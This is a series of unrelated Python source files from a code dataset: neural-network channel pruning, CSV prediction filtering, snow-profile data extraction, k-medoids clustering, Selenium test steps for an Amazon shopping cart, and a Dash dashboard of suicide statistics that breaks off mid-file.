net_origin_parallel.eval()\n net_pruned_parallel.eval()\n\n layer.pruned_weight.requires_grad = True\n aux_fc.cuda()\n logger_counter = 0\n record_time = utils.AverageMeter()\n\n for channel in range(layer.in_channels):\n if layer.d.eq(0).sum() <= math.floor(layer.in_channels * self.settings.pruning_rate):\n break\n\n time_start = time.time()\n cum_grad = None\n record_selection_mse_loss = utils.AverageMeter()\n record_selection_softmax_loss = utils.AverageMeter()\n record_selection_loss = utils.AverageMeter()\n img_count = 0\n for i, (images, labels) in enumerate(self.train_loader):\n images = images.cuda()\n labels = labels.cuda()\n net_origin_parallel(images)\n output = net_pruned_parallel(images)\n softmax_loss = criterion_softmax(aux_fc(output), labels)\n\n origin_feature = self._concat_gpu_data(self.feature_cache_origin)\n self.feature_cache_origin = {}\n pruned_feature = self._concat_gpu_data(self.feature_cache_pruned)\n self.feature_cache_pruned = {}\n mse_loss = criterion_mse(pruned_feature, origin_feature)\n\n loss = mse_loss * self.settings.mse_weight + softmax_loss * self.settings.softmax_weight\n loss.backward()\n record_selection_loss.update(loss.item(), images.size(0))\n record_selection_mse_loss.update(mse_loss.item(), images.size(0))\n record_selection_softmax_loss.update(softmax_loss.item(), images.size(0))\n\n if cum_grad is None:\n cum_grad = layer.pruned_weight.grad.data.clone()\n else:\n cum_grad.add_(layer.pruned_weight.grad.data)\n layer.pruned_weight.grad = None\n\n img_count += images.size(0)\n if self.settings.max_samples != -1 and img_count >= self.settings.max_samples:\n break\n\n self.v_logger.log_scalar(\"F-block-{}_{}_LossAll\".format(block_count, layer_name),\n record_selection_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_MSELoss\".format(block_count, layer_name),\n record_selection_mse_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_SoftmaxLoss\".format(block_count, layer_name),\n record_selection_softmax_loss.avg,\n logger_counter)\n\n cum_grad.abs_()\n # calculate gradient F norm\n grad_fnorm = cum_grad.mul(cum_grad).sum((2, 3)).sqrt().sum(0)\n\n # find grad_fnorm with maximum absolute gradient\n while True:\n _, max_index = torch.topk(grad_fnorm, 1)\n if layer.d[max_index[0]] == 0:\n layer.d[max_index[0]] = 1\n layer.pruned_weight.data[:, max_index[0], :, :] = layer.weight[:, max_index[0], :, :].data.clone()\n break\n else:\n grad_fnorm[max_index[0]] = -1\n\n # fine-tune average meter\n record_finetune_softmax_loss = utils.AverageMeter()\n record_finetune_mse_loss = utils.AverageMeter()\n record_finetune_loss = utils.AverageMeter()\n\n record_finetune_top1_error = utils.AverageMeter()\n record_finetune_top5_error = utils.AverageMeter()\n\n # define optimizer\n params_list = []\n params_list.append({\"params\": layer.pruned_weight, \"lr\": self.settings.layer_wise_lr})\n if layer.bias is not None:\n layer.bias.requires_grad = True\n params_list.append({\"params\": layer.bias, \"lr\": 0.001})\n optimizer = torch.optim.SGD(params=params_list,\n weight_decay=self.settings.weight_decay,\n momentum=self.settings.momentum,\n nesterov=True)\n img_count = 0\n for epoch in range(1):\n for i, (images, labels) in enumerate(self.train_loader):\n images = images.cuda()\n labels = labels.cuda()\n features = net_pruned_parallel(images)\n net_origin_parallel(images)\n output = aux_fc(features)\n softmax_loss = criterion_softmax(output, labels)\n\n origin_feature = self._concat_gpu_data(self.feature_cache_origin)\n self.feature_cache_origin = {}\n pruned_feature = self._concat_gpu_data(self.feature_cache_pruned)\n self.feature_cache_pruned = {}\n mse_loss = criterion_mse(pruned_feature, origin_feature)\n\n top1_error, _, top5_error = utils.compute_singlecrop(\n outputs=output, labels=labels,\n loss=softmax_loss, top5_flag=True, mean_flag=True)\n\n # update parameters\n optimizer.zero_grad()\n loss = mse_loss * self.settings.mse_weight + softmax_loss * self.settings.softmax_weight\n loss.backward()\n torch.nn.utils.clip_grad_norm_(layer.parameters(), max_norm=10.0)\n layer.pruned_weight.grad.data.mul_(\n layer.d.unsqueeze(0).unsqueeze(2).unsqueeze(3).expand_as(layer.pruned_weight))\n optimizer.step()\n # update record info\n record_finetune_softmax_loss.update(softmax_loss.item(), images.size(0))\n record_finetune_mse_loss.update(mse_loss.item(), images.size(0))\n record_finetune_loss.update(loss.item(), images.size(0))\n record_finetune_top1_error.update(top1_error, images.size(0))\n record_finetune_top5_error.update(top5_error, images.size(0))\n\n img_count += images.size(0)\n if self.settings.max_samples != -1 and img_count >= self.settings.max_samples:\n break\n\n layer.pruned_weight.grad = None\n if layer.bias is not None:\n layer.bias.requires_grad = False\n\n self.v_logger.log_scalar(\"F-block-{}_{}_SoftmaxLoss\".format(block_count, layer_name),\n record_finetune_softmax_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_Loss\".format(block_count, layer_name),\n record_finetune_mse_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_MSELoss\".format(block_count, layer_name),\n record_finetune_loss.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_Top1Error\".format(block_count, layer_name),\n record_finetune_top1_error.avg,\n logger_counter)\n\n self.v_logger.log_scalar(\"F-block-{}_{}_Top5Error\".format(block_count, layer_name),\n record_finetune_top5_error.avg,\n logger_counter)\n\n # write log information to file\n self._write_log(\n dir_name=os.path.join(self.settings.save_path, \"log\"),\n file_name=\"log_block-{:0>2d}_{}.txt\".format(block_count, layer_name),\n log_str=\"{:d}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t{:f}\\t\\n\".format(\n int(layer.d.sum()),\n record_selection_loss.avg,\n record_selection_mse_loss.avg,\n record_selection_softmax_loss.avg,\n record_finetune_loss.avg,\n record_finetune_mse_loss.avg,\n record_finetune_softmax_loss.avg,\n record_finetune_top1_error.avg,\n record_finetune_top5_error.avg))\n log_str = \"Block-{:0>2d}-{}\\t#channels: [{:0>4d}|{:0>4d}]\\t\".format(\n block_count, layer_name,\n int(layer.d.sum()), layer.d.size(0))\n log_str += \"[selection]loss: {:4f}\\tmseloss: {:4f}\\tsoftmaxloss: {:4f}\\t\".format(\n record_selection_loss.avg,\n record_selection_mse_loss.avg,\n record_selection_softmax_loss.avg)\n log_str += \"[fine-tuning]loss: {:4f}\\tmseloss: {:4f}\\tsoftmaxloss: {:4f}\\t\".format(\n record_finetune_loss.avg,\n record_finetune_mse_loss.avg,\n record_finetune_softmax_loss.avg)\n log_str += \"top1error: {:4f}\\ttop5error: {:4f}\".format(\n record_finetune_top1_error.avg,\n record_finetune_top5_error.avg)\n self.logger.info(log_str)\n\n logger_counter += 1\n time_interval = time.time() - time_start\n record_time.update(time_interval)\n\n for params in net_origin_parallel.parameters():\n params.requires_grad = True\n for params in net_pruned_parallel.parameters():\n params.requires_grad = True\n\n # remove hook\n hook_origin.remove()\n hook_pruned.remove()\n log_str = \"|===>Select channel from block-{:d}_{}: time_total:{} time_avg: {}\".format(\n block_count, layer_name,\n str(datetime.timedelta(seconds=record_time.sum)),\n str(datetime.timedelta(seconds=record_time.avg)))\n self.logger.info(log_str)\n log_str = \"|===>fine-tuning result: loss: {:f}, mse_loss: {:f}, softmax_loss: {:f}, top1error: {:f} top5error: {:f}\".format(\n record_finetune_loss.avg,\n record_finetune_mse_loss.avg,\n record_finetune_softmax_loss.avg,\n record_finetune_top1_error.avg,\n record_finetune_top5_error.avg)\n self.logger.info(log_str)\n\n self.logger.info(\"|===>remove hook\")\n\n @staticmethod\n def _write_log(dir_name, file_name, log_str):\n \"\"\"\n Write log to file\n :param dir_name: the path of directory\n :param file_name: the name of the saved file\n :param log_str: the string that need to be saved\n \"\"\"\n\n if not os.path.isdir(dir_name):\n os.mkdir(dir_name)\n with open(os.path.join(dir_name, file_name), \"a+\") as f:\n f.write(log_str)\n\n def _seg_channel_selection(self, net_origin, net_pruned, aux_fc, pivot_index, index):\n \"\"\"\n conduct segment channel selection\n :param net_origin: original network segments\n :param net_pruned: pruned network segments\n :param aux_fc: auxiliary fully-connected layer\n :param pivot_index: the layer index of the additional loss\n :param index: the index of segment\n :return:\n \"\"\"\n block_count = 0\n if self.settings.net_type in [\"preresnet\", \"resnet\"]:\n for module in net_pruned.modules():\n if isinstance(module, (PreBasicBlock, BasicBlock)):\n block_count += 1\n # We will not prune the pruned blocks again\n if not isinstance(module.conv2, MaskConv2d):\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count,\n layer_name=\"conv2\")\n self.logger.info(\"|===>checking layer type: {}\".format(type(module.conv2)))\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n pivot_index, channel_selection=True,\n index=index, block_count=block_count)\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n pivot_index,\n channel_selection=True,\n index=index, block_count=block_count)\n\n elif isinstance(module, Bottleneck):\n block_count += 1\n if not isinstance(module.conv2, MaskConv2d):\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count,\n layer_name=\"conv2\")\n\n if not isinstance(module.conv3, MaskConv2d):\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count,\n layer_name=\"conv3\")\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n pivot_index, channel_selection=True,\n index=index, block_count=block_count)\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n pivot_index,\n channel_selection=True,\n index=index, block_count=block_count)\n elif self.settings.net_type in ['vgg', 'lenet']:\n ms = iter(net_pruned.modules())\n next(ms)\n for module in ms:\n\n if isinstance(module, (nn.Conv2d)):\n #block_count += 1\n # We will not prune the pruned blocks again\n self._layer_channel_selection(\n net_origin=net_origin, net_pruned=net_pruned,\n aux_fc=aux_fc, module=module, block_count=block_count)\n self.logger.info(\"|===>checking layer type: {}\".format(type(module)))\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n pivot_index, channel_selection=True,\n index=index, block_count=block_count)\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n pivot_index,\n channel_selection=True,\n index=index, block_count=block_count)\n block_count += 1\n\n\ndef main():\n #parser = argparse.ArgumentParser(description=\"Discrimination-aware channel pruning\")\n #parser.add_argument('conf_path', type=str, metavar='conf_path',\n # help='configuration path')\n #args = parser.parse_args()\n\n option = Option(\"mnist_lenet5_03.hocon\")\n #option = Option(\"mnist_resnet18_03.hocon\")\n vis = VisdomLogger(port=10999)\n l = LoggerForSacred(vis,0)\n experiment = Experiment(option, logger=l)\n experiment.channel_selection()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dcp/channel_pruning.py","file_name":"channel_pruning.py","file_ext":"py","file_size_in_byte":51450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"488770745","text":"import pandas as pd\nimport os\nimport sys\nimport argparse\nimport time\nimport datetime\nfrom classify_images import write_dataframe_to_CSV\n\ndef process_input_arguments():\n parser = argparse.ArgumentParser('Export predictions below a certain uncertainty.')\n parser.add_argument('-p', '--predictions', help='Filename or file path for predictions CSV')\t\n parser.add_argument('-c', '--certainty', help='Threshold for certainty')\n parser.add_argument('-s', '--setting', default='l', help ='l for low confidence filter, h for high confidence filter')\n args = parser.parse_args()\n filename = args.predictions\n threshold = float(args.certainty)\n setting = args.setting\n\n return filename, threshold, setting\n\nif __name__ == '__main__':\n # Start execution and parse arguments\n start_time = time.time()\n filename, threshold, setting = process_input_arguments()\n\n # Read in predictions and sort by confidence level\n predictions = pd.read_csv(filename)\n col1 = predictions.columns[1]\n col2 = predictions.columns[2]\n predictions = predictions.sort_values(by=[col2])\n\n # Select those tuples where BOTH predictions are below a certain threshold\n # e.g. threshold = 0.6, and predictions[1] = 0.55 and predictions[2] = 0.45\n results = []\n filename_option = ''\n if setting == 'l':\n results = predictions[(predictions[col1] < threshold) & (predictions[col2] < threshold)]\n filename_option = 'low_confidence'\n elif setting == 'h':\n results = predictions[(predictions[col1] < (1 - threshold)) | (predictions[col2] < (1 - threshold))]\n filename_option = 'high_confidence'\n else:\n print('ERROR: Invalid setting selected. (Hint: choose l for low or h for high confidence filtering.)')\n sys.exit(0)\n\n # Save to file\n filepath = write_dataframe_to_CSV('predictions', filename_option, results)\n print('Predictions saved to %s .' % filepath)\n\n # Finish execution\n end_time = time.time()\n print('Completed in %.1f seconds' % (end_time - start_time))","sub_path":"utilities/archive/list_images_confidence_threshold.py","file_name":"list_images_confidence_threshold.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396230398","text":"import sqlite3\n\nwith sqlite3.connect(\"cars.db\") as connection:\n\tc = connection.cursor()\n\n\tcars = [\n\t(\"Ford\", \"Mondeo\", 10),\n\t(\"Ford\", \"Fiesta\", 2000),\n\t(\"Ford\", \"Edge\", 65),\n\t(\"Honda\", \"Civic\", 222),\n\t(\"Honda\", \"Jazz\", 50)\n\t]\n\n\tc.executemany(\"INSERT INTO inventory VALUES(?, ?, ?)\", cars)\n","sub_path":"cars_02_sql.py","file_name":"cars_02_sql.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192804714","text":"# -*- coding: utf-8 -*-\n\"\"\"Module for extracting results from tests and profiles in Regobs.\"\"\"\n\nimport setenvironment as env\nfrom varsomdata import getvarsompickles as gvp\nfrom varsomdata import getobservations as go\nimport collections as cols\nimport logging as lg\n\n__author__ = 'ragnarekker'\n\n\ndef _str(s):\n \"\"\"Wash the strings.\"\"\"\n\n if s is None:\n s = ''\n\n if s == 'Ikke gitt':\n s = ''\n\n if s == 'Ikke spesifisert':\n s = ''\n\n return str(s)\n\n\nclass TestsAndLayerInfo:\n\n def __init__(self, t, p):\n\n self.result = t.PropagationName\n self.test = None\n self.pnx = None\n self.depth = t.FractureDepth\n self.taps = t.TapsFracture\n self.fracture = t.ComprTestFractureName\n self.url = f\"{env.registration_basestring}{t.RegID}\"\n self.obstime = str(t.DtObsTime)\n self.forecast_region_name = t.ForecastRegionName\n self.forecast_region_tid = t.ForecastRegionTID\n\n self.layer_thickness = None\n self.layer_grain_form = None\n self.layer_grain_size = None\n self.layer_hardness = None\n self.layer_hardness_id = None\n\n self.above_layer_thickness = None\n self.above_layer_grain_form = None\n self.above_layer_grain_size = None\n self.above_layer_hardness = None\n self.above_layer_hardness_id = None\n\n self.below_layer_thickness = None\n self.below_layer_grain_form = None\n self.below_layer_grain_size = None\n self.below_layer_hardness = None\n self.below_layer_hardness_id = None\n\n self._set_test()\n self._set_pnx()\n\n if self.depth: # Only given if there is a fracture somewhere\n if p:\n self._set_layer_info(p)\n\n self.original_test = t\n self.original_profile = p\n\n def _set_test(self):\n if 'ECT' in self.result:\n self.test = 'ECT'\n elif 'CT' in self.result:\n self.test = 'CT'\n\n def _set_pnx(self):\n\n if self.result == 'ECTX' or self.result == 'CTN':\n self.pnx = 'X'\n elif 'ECTP' in self.result:\n self.pnx = 'P'\n elif 'ECTN' in self.result:\n self.pnx = 'N'\n\n def _set_layer_info(self, p):\n\n l_index = 0\n layer_selected = False\n if p.StratProfile:\n\n for l in p.StratProfile:\n if layer_selected is False:\n # if test result in a boundary,\n # and it is not at the top by faulty observation,\n # find which layer is the loosest (lower TID for looser layer)\n # and choose this for the layer we are studying\n # else, go back one layer and choose this\n if l.DepthTop == self.depth:\n if l_index > 0:\n if l.HardnessTID <= p.StratProfile[l_index-1].HardnessTID:\n layer_selected = True\n else:\n l_index -= 1\n l = p.StratProfile[l_index]\n layer_selected = True\n\n # else if test is in a layer, all is clear\n elif l.DepthTop < self.depth < (l.DepthTop + l.Thickness):\n layer_selected = True\n\n if layer_selected:\n self.layer_thickness = l.Thickness\n self.layer_grain_form = l.GrainFormPrimaryName\n self.layer_grain_size = l.GrainSizeAvg\n self.layer_hardness = l.HardnessName\n self.layer_hardness_id = l.HardnessTID\n\n if l_index > 0:\n self.above_layer_thickness = p.StratProfile[l_index-1].Thickness\n self.above_layer_grain_form = p.StratProfile[l_index-1].GrainFormPrimaryName\n self.above_layer_grain_size = p.StratProfile[l_index-1].GrainSizeAvg\n self.above_layer_hardness = p.StratProfile[l_index-1].HardnessName\n self.above_layer_hardness_id = p.StratProfile[l_index-1].HardnessTID\n\n if len(p.StratProfile) > l_index + 1:\n self.below_layer_thickness = p.StratProfile[l_index+1].Thickness\n self.below_layer_grain_form = p.StratProfile[l_index+1].GrainFormPrimaryName\n self.below_layer_grain_size = p.StratProfile[l_index+1].GrainSizeAvg\n self.below_layer_hardness = p.StratProfile[l_index+1].HardnessName\n self.below_layer_hardness_id = p.StratProfile[l_index+1].HardnessTID\n\n l_index += 1\n\n def to_ord_dict(self):\n\n _ord_dict = cols.OrderedDict([\n ('Result', self.result),\n ('Test', self.test),\n ('PNX', self.pnx),\n ('Depth', self.depth),\n ('Taps', self.taps),\n ('Fracture', self.fracture),\n ('Layer thick', self.layer_thickness),\n ('Layer grain', self.layer_grain_form),\n ('Layer grain Ø', self.layer_grain_size),\n ('Layer hardness', self.layer_hardness),\n ('Above thick', self.above_layer_thickness),\n ('Above grain', self.above_layer_grain_form),\n ('Above grain Ø', self.above_layer_grain_size),\n ('Above hardness', self.above_layer_hardness),\n ('Below thick', self.below_layer_thickness),\n ('Below grain', self.below_layer_grain_form),\n ('Below grain Ø', self.below_layer_grain_size),\n ('Below hardness', self.below_layer_hardness),\n ('Region', self.forecast_region_name),\n ('Region ID', self.forecast_region_tid),\n ('Obs time', self.obstime),\n ('URL', self.url)\n ])\n\n return _ord_dict\n\n\ndef get_tests_and_layer_info_to_gustav():\n \"\"\"Gustav Pless wrote 28th Oct 2019:\n\n Hei\n\n Jeg jobber med en liten studie der jeg sammenligner et sett stabilitetstester og\n registrerer forskjeller. Jeg utfører et sett tester sammen med en snøprofil og\n kan se på hvilke tester som er effektive på hvilken type svakt lag, dybde, hardhet\n etc. Ulempen min er at jeg ikke får et godt statistisk utvalg, men det finnes jo i\n regobs. I hvert fall på ECT og CT. Vedlagt er det relativt begrensede\n datagrunnlaget jeg har enn så lenge.\n\n Er det mulig å få dratt ut data fra alle ECT og CT tester fra regobs? Da kan jeg\n for eksempel se på resultater som på hvilken dybde ECT og CT gir respons, hvis det\n finnes noen sammenheng mellom forplanting og dybde etc.\n\n I tillegg skulle jeg kunne se på alle stabilitetstester som er utført sammen med\n snøprofiler og trekke ut data fra det. Men det er jeg redd blir en mye mer manuell oppgave.\n\n Mvh\n Gustav\n\n :return:\n \"\"\"\n\n years = ['2019-20', '2018-19', '2017-18', '2016-17']\n # years = ['2018-19']\n\n all_observations = []\n for y in years:\n all_observations += gvp.get_all_observations(y)\n\n tests = []\n\n for o in all_observations:\n for f in o.Observations:\n if isinstance(f, go.ColumnTest) or isinstance(f, go.ProfileColumnTest):\n if f.CompetenceLevelTID >= 120: # Level of Competence at *** or more\n if 'Ikke gitt' not in f.PropagationName:\n\n profile = None\n if f.IncludeInSnowProfile:\n for tf in o.Observations:\n if isinstance(tf, go.SnowProfile):\n profile = tf\n\n tests.append(TestsAndLayerInfo(f, profile))\n\n file_and_folder = f'{env.output_folder}tests_to_gustav_pless.csv'\n\n # Write to file\n with open(file_and_folder, 'w', encoding='utf-8') as f:\n make_header = True\n for t in tests:\n if make_header:\n f.write(';'.join([_str(d) for d in t.to_ord_dict().keys()]) + '\\n')\n make_header = False\n f.write(';'.join([_str(d) for d in t.to_ord_dict().values()]) + '\\n')\n\n\nif __name__ == '__main__':\n\n get_tests_and_layer_info_to_gustav()\n","sub_path":"varsomscripts/testsandprofiles.py","file_name":"testsandprofiles.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258765721","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 01 11:28:27 2015\n\n@author: tsz\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport math\nimport k_medoids\nimport k_medoids_google_or\nimport clustering_helpers\n\ndef _distances(values, norm=2):\n \"\"\"\n Compute distance matrix for all data sets (rows of values)\n \n Parameters\n ----------\n values : 2-dimensional array\n Rows represent days and columns values\n norm : integer, optional\n Compute the distance according to this norm. 2 is the standard\n Euklidean-norm.\n \n Return\n ------\n d : 2-dimensional array\n Distances between each data set\n \"\"\"\n # Initialize distance matrix\n d = np.zeros((values.shape[1], values.shape[1]))\n\n # Define a function that computes the distance between two days\n dist = (lambda day1, day2, r: \n math.pow(np.sum(np.power(np.abs(day1 - day2), r)), 1/r))\n\n # Remember: The d matrix is symmetrical!\n for i in range(values.shape[1]): # loop over first days\n for j in range(i+1, values.shape[1]): # loop second days\n d[i, j] = dist(values[:,i], values[:,j], norm)\n \n # Fill the remaining entries\n d = d + d.T\n \n return d\n\n\ndef cluster(inputs, \n number_clusters=12, \n norm=2, \n time_limit=300,\n mip_gap=0.0,\n google_or=False):\n \"\"\"\n Cluster a set of inputs into clusters by solving a k-medoid problem.\n \n Parameters\n ----------\n inputs : 2-dimensional array\n First dimension: Number of different input types.\n Second dimension: Values for each time step of interes.\n number_clusters : integer, optional\n How many clusters shall be computed?\n norm : integer, optional\n Compute the distance according to this norm. 2 is the standard\n Euklidean-norm.\n time_limit : integer, optional\n Time limit for the optimization in seconds\n mip_gap : float, optional\n Optimality tolerance (0: proven global optimum)\n \n Returns\n -------\n scaled_typ_days : \n Scaled typical demand days. The scaling is based on the annual demands.\n nc : array_like\n Weighting factors of each cluster\n z : 2-dimensional array\n Mapping of each day to the clusters\n \"\"\"\n # Determine time steps per day\n len_day = 24\n days = int(inputs.shape[1] / len_day)\n \n # Manipulate inputs\n # Initialize arrays\n inputsTransformed = []\n inputsScaled = []\n inputsScaledTransformed = []\n \n # Fill and reshape\n # Scaling to values between 0 and 1, thus all inputs shall have the same\n # weight and will be clustered equally in terms of quality \n for i in range(inputs.shape[0]):\n vals = inputs[i,:]\n temp = (vals - np.min(vals)) / (np.max(vals) - np.min(vals))\n inputsScaled.append(temp)\n inputsScaledTransformed.append(temp.reshape((len_day, days), order=\"F\"))\n inputsTransformed.append(vals.reshape((len_day, days), order=\"F\"))\n\n # Put the scaled and reshaped inputs together\n L = np.concatenate(tuple(inputsScaledTransformed))\n\n # Compute distances\n d = _distances(L, norm)\n\n # Execute optimization model\n if google_or:\n opt_function = k_medoids_google_or.k_medoids\n else:\n opt_function = k_medoids.k_medoids\n (y, z, obj, gap) = opt_function(d, number_clusters, time_limit, mip_gap)\n \n # Section 2.3 and retain typical days\n nc = np.zeros(number_clusters)\n typicalDays = []\n\n # nc contains how many days are there in each cluster\n nc = []\n for i in xrange(len(y)):\n temp = np.sum(z[i,:])\n if temp > 0:\n nc.append(temp)\n typicalDays.append([ins[:,i] for ins in inputsTransformed])\n\n typicalDays = np.array(typicalDays)\n nc = np.array(nc, dtype=\"int\")\n\n # Scaling to preserve original demands\n scaled = clustering_helpers.scaling(inputs=inputs,\n typicalDays=typicalDays,\n nc=nc)\n (scaled_typ_days, scaling_factors) = scaled\n \n return (scaled_typ_days, nc, z, scaling_factors, obj, gap)","sub_path":"k_medoids_google_or/clustering_exact.py","file_name":"clustering_exact.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"100988189","text":"\nfrom behave import given, when, then\nfrom time import sleep\nfrom selenium.webdriver.common.by import By\n\nsearch = (By.ID, 'twotabsearchtextbox')\nsearch_icon = (By.CSS_SELECTOR, \"input.nav-input[value='Go']\")\nselect_item = (By.CSS_SELECTOR, \"img.s-image[src='https://m.media-amazon.com/images/I/811mZ5F0YVL._AC_UL320_.jpg']\")\nadd_cart = (By.CSS_SELECTOR, \"input#add-to-cart-button\")\n#number_items = (By.XPATH, \"//span[@class='sc-without-fresh-inline']\")\nnumber_items=(By.ID, 'sc-subtotal-label-buybox')\nopen_cart = (By.CSS_SELECTOR, \"nav-cart\")\n\n\n@given('open amazon website')\ndef open_amazon(context):\n context.driver.get(\"https://www.amazon.com\")\n context.driver.maximize_window()\n sleep(4)\n\n\n@when('input teddy bear into search field')\ndef teddy_bear_search(context):\n search_item = context.driver.find_element(*search)\n search_item .send_keys(\"teddy bear\")\n context.driver.find_element(*search_icon).click()\n #search_icon.click()\n sleep(3)\n\n\n@when('click on the product')\ndef click_product(context):\n context.driver.find_element(*select_item).click()\n\n\n@when('click on add to cart')\ndef add_item(context):\n context.driver.find_element(*add_cart).click()\n\n\n@then('verify number of items')\ndef verify_number(context):\n context.driver.find_element(*open_cart).click()\n verify = context.driver.find_element(*number_items)\n assert 'Subtotal (1 item)' in verify.text\n","sub_path":"features/steps/amazon_cart.py","file_name":"amazon_cart.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"268164701","text":"import numpy as np\nimport geom.cuboct\n\nvox_pitch = 0.0762 #m\ncord = 2*0.3048 #m\n\n#Create 2-D bounding box for voxelization\n#Estimate number of voxels in cord length\nsize_x = round(cord/vox_pitch);\nsize_y = round(0.3*size_x);\n\nmat_matrix = []\n\nfor i in range(0,size_y):\n temprow = []\n for j in range(0,size_x):\n #This is just temporary it will be replaced with intertools.permutations later\n if (i==1)|((i==0)&(j==2)):\n temprow.append([1])\n else:\n temprow.append([0])\n mat_matrix.append(temprow)\n\nnode_frame_map = np.zeros((size_x,size_y,1,6))\nnodes,frames,node_frame_map,dims = geom.cuboct.from_material(mat_matrix,vox_pitch)\n\n","sub_path":"src/crossSection.py","file_name":"crossSection.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"593211036","text":"import dash\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n#import dash_daq as daq\n\nimport src.dash_plots \n\n\nfrom src.data_mugging import clean_data\nimport src.data_mugging\nimport pandas as pd\n\nsuicide_dataset = pd.read_csv('data/master.csv')\ncleaned_data = clean_data('data/master.csv')\n\n\nfigure1 = global_suicide_stat = src.dash_plots.create_world_plot(cleaned_data,\n location='code',\n color='suicides_no',\n hover_name='country')\n\n# Suicides_per_capita plot:\ndata_clean_suicide_per_capita = src.data_mugging.suicides_per_capita(\n suicide_dataset)\n\n# Suicides by gender plot:\ndata_suicides_by_gender = src.data_mugging.suicides_by_gender(suicide_dataset)\n\n# suicides by gdp\ndata_suicides_by_gdp = src.data_mugging.suicide_by_gdp(suicide_dataset)\n\n# Create a list that is required for the slider:\nsuicide_dataset['year'] = pd.to_datetime(suicide_dataset.year, format='%Y')\nsuicide_dataset['year'] = suicide_dataset['year'].dt.year\ndate_list = suicide_dataset['year'].unique().tolist()\ndate_label = [str(i) for i in date_list]\nzipobj = zip(date_label, date_label)\ndic_date = dict(zipobj)\n# dict_date_hard_code = {i : '{}'.format(i) for i in range(1987,2016, 3)}\n\n# Create an array for year:\nyear_value = [1985, 2016]\nyear_value = pd.to_datetime(pd.Series(year_value), format='%Y')\nyear_value = year_value.dt.year\n\napp = dash.Dash(external_stylesheets=[dbc.themes.SLATE])\nserver = app.server\n\napp.layout = dbc.Container([\n html.H1('SUICIDES : A GLOBAL IMPERATIVE',\n style={'text-align': 'center'}),\n html.H5('Our dashboard provides an interactive exploration of suicide rates overview from 1985 to 2016. The data is visualized by age, country, gender and generation'),\n html.Br(),\n html.Div(\n [\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n 'COUNTRY',\n dcc.Dropdown(\n id='country-dropdown',\n value='Canada',\n options=[{'label': col, 'value': col} for col in cleaned_data['country']],placeholder = 'Select Country'),\n\n html.Br(),\n 'AGE',\n dcc.Dropdown(\n id='age-dropdown',\n value='15-24 years',\n options=[{'label': col, 'value': col} for col in suicide_dataset['age'].unique()]),\n\n html.Br(),\n\n 'GENDER',\n dcc.Dropdown(\n id='gender-dropdown',\n value='male',\n options=[{'label': 'Male', 'value': 'male'},\n {'label': 'Female', 'value': 'female'}],\n # multi = True\n # labelStyle={'display': 'inline-block', 'cursor': 'pointer', 'margin-left': '20px'}\n )])]))], width=4),\n\n dbc.Col(\n [dbc.Card(dbc.CardBody([html.P(dcc.Graph(figure=figure1))]))], width=8),\n ]\n ),\n html.Br(),\n\n html.H3('Economic Factors'),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n dbc.Row([\n dbc.Col([\n # Aditya's graph:\n html.Iframe(\n id='scatter',\n style={'border-width': '0', 'width': '100%', 'height': '400px'})\n ]),\n dbc.Col([\n html.Iframe(\n srcDoc=src.dash_plots.country_plot(\n source=data_suicides_by_gdp),\n id='scroll-plot',\n style={'border-width': '0',\n 'width': '100%', 'height': '410px'}\n )\n ])\n ]),\n ])\n ]))], width=12)\n ]),\n html.Br(),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n html.Div(\n dcc.RangeSlider(\n id='range-slider',\n min=min(date_list),\n 